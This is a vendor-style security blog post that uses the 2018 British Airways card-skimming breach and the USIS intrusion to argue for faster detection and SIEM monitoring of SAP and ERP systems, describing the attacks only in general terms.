A question to all organizations, especially the ones running enterprise applications such as SAP®
the BBC recently reported a 'malicious' data breach at British Airways
On September 6th, 2018, British Airways announced a serious breach to its impacted customers. Hackers had exploited a security vulnerability in the company’s software starting on 21st August. They proceeded to steal customers’ personal and financial information, excluding passport details, for a period of two weeks.
Approximately 380,000 credit card payments were compromised in the on-line booking process. This means for the customers of the airline (you and me) in addition to the possible potential financial loss, the headache of getting your payment back, also the risk that our identity was stolen. A concern that will accompany us (the affected passengers) for a lifetime from now on. Particularly worrying is the long period in which this data breach has gone undetected, we have become a statistic called mean time to identify (MTTI). But this is just one example in the series of serious data breaches. Although awareness of cyberattacks is steadily increasing, companies rarely detect cyber-attacks routinely. Very often the attack is only detected when the damage has become obvious. As with this airline – a very huge organization with more than 40.000 Employees and a annual turnover from about 12,2 Billion GBP!
By the way, the mean time to identify (MTTI) in an average is 197 days, the mean time to contain (MTTC) is 69 days. Please read also our past blog Dealing with cyber threats in the SAP® / ERP application layer
Unfortunately, attacks on personal sensitive data, corporate confidential data are nowadays part of everyday life. But really shocking was the duration of the infringement and the importance and size of the company concerned! Many hundreds of thousands of customers had their sensitive data stolen information over weeks. Almost 400,000 credit card transactions were affected, also the frequent travelers corporate credit card information!
Accessing the system and downloading all this data is neither quick nor easy most people would think. We looked at the way how it was done and it was very easy, scriptkiddie stuff, 20 lines of JAVA code injected on a website, that was it. Upon submitting the airline transaction a backdoor was created and data was re-routed ..... thank you for submitting your confidential and financial data!!!!!
Normally the corporate network keeps track of who is connecting, from where, network packages, protocols, patterns and signatures, incoming and outgoing data are analyzed. A Security Operations Center (SOC) or a Network Operations Center (NOC) should DETECT and notify and STOP IT when huge amounts of information is downloaded, right? How could the hackers exploit a known vulnerability and compromise the information of hundreds of thousands of people for weeks? And that is exactly the problem ..... there are so many means and ways and different IT components in the whole digital chain that make up the every day business processes, you need to have a very comprehensive and holistic view on all the components, traffic and behavior.
Unfortunately, British Airways is only one of the most recent massive cyber incident:
But even if this incident was a coincidence (and it clearly was not if you look at the 20 lines of injected code), should not the growth of the cyber security market itself give cause for concern? What does tell you? What does it mean when the predictions say in 2019 there will be a shortage of 2 million cyber security personell?
Wake up folks !!!! Violations, hacks, breaches are commonplace in the industry. The number of attacks are growing, they are getting smarter. Perhaps a dent to your ego, but you are collaterol damage, mostly you are not the target at start, you just pop up in a scan of vulnerabilities and you seem to be an easy target.
There have been very serious violations in the past that have compromised companies and stolen millions of user data. In some cases, it took several years for the vulnerabilities to be discovered or the compromised companies went out of business as the USIS example shows:
"Cyber criminals attacked the USIS network in late 2013. However, these activities were not discovered until the following June, giving attackers at least half a year to undetected access to internal and sensitive information, and the damage is difficult to assess.
This incident once again demonstrates the current lack of awareness of how to protect and monitor SAP systems.”
Why are cyber security attacks possible?
IT operations and especially IT security is very complex, especially in times of digitization and Industry 4.0 (the digital transformation). Please read also our past blog SAP® Security nowadays ..... Businesses must provide immediate access to employees, customers, and others around the world while keeping cybercriminals out. Some of the factors are:
Patching known vulnerabilities
Software vendors are constantly testing their software for vulnerabilities (some are doing this anyway), so they regularly release patches. When such a patch is released, the search for vulnerabilities and ways to exploit them begins. The time your IT ops crew needs to upgrade your systems (analyze configuration, analyze impact, plan for downtime, test, move to production) is the time it takes for hackers to exploit these new vulnerabilities to gain access to your IT landscape.
Threats from within your own company
If a user can access an IT resource, they can also manipulate and compromise that resource. Sometimes this happens maliciously, e.g. to enrich yourself or harm the employer or a colleague. Then, for example, a database is sabotaged. However, an insider threat is often based on errors such as a weak password, an abandoned and unlocked computer, or the found USB stick, a document download with a malware inside, and hundreds more different possibilities.
Missing access controls
Here, less the better! The fewer users that have access to sensitive information, the less likely it is that this information is at risk. The fewer privileges a user has, the less damage can be caused by a hacker when he compromised that user's account. Ideally, each user should have a custom account or user privileges exactly tailored to their role - no more. Often it is omitted for convenience! Segeration of duty and other compliance controls are often an unloved stepchild, and many companies are not sufficiently segregating their responsibilities so their landscapes are more exposed to cyber security threats.
So how can you beat Cyber Crime?
You can't (unless you go off grid), for now it is only a matter of trying to keep up with the bad guys. That is unfortunately the truth. You can however keep up better and faster!
From our point of view, a 360 ° approach regarding real-time monitoring is essential! This is realized by implementing a SIEM strategy, connect your log files and you at least reduce the Mean Time To Identify, resulting in faster Mean Time To Contain. Typically, endpoints such as notebooks or mobile phones are integrated as well as networks, servers and databases, software applications and of course the traditional security solutions such as identity and access solutions. The mission critical application, the SAP® system, is not integrated or insufficiently automated in the SIEM strategy.
Let us go back to the beginning! It was about DETECTION, so the early detection of unusual processes, downloads, access, locations, transaction and changes will be on your radar. Had British Airways been able to DETECT such code injection to the system, in the first few seconds the alarm would have notfied them! Please read also our past blog, here we describe the 360° approach from Insight, Prevent, Detect and Respond: